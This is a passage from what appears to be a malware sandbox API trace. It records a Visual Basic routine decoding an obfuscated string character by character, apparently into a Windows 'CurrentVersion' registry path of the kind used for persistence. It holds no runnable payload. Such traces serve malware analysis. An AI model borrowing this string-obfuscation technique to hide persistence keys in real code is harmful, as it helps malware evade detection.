lpWideCharStr="e") returned 1 [0167.867] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.867] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0167.867] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.868] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0167.868] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.869] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0167.869] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.870] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0167.870] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.871] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.871] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.872] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0167.872] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.873] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0167.873] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.874] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0167.874] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.874] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0167.875] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.875] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0167.876] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.876] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0167.876] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.877] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0167.877] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.878] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0167.878] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.879] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0167.879] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.880] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0167.880] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.880] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0167.881] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.881] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0167.882] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.882] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0167.882] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.883] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0167.883] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.884] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0167.884] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.885] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0167.885] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.886] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.886] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.886] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.887] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.887] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0167.889] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.889] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0167.890] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.890] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0167.890] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.891] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0167.891] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.892] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0167.892] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.893] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.893] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.894] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0167.894] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.894] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0167.895] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.895] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0167.895] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.896] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0167.896] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.897] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0167.897] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.898] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0167.898] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="…", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="…\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.899] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0167.899] VarCat (in: pvarLeft=0x28f880, pvarRight=0x28f950, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="}", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="}\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.899] VarSub (in: pvarLeft=0x28fa10, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) 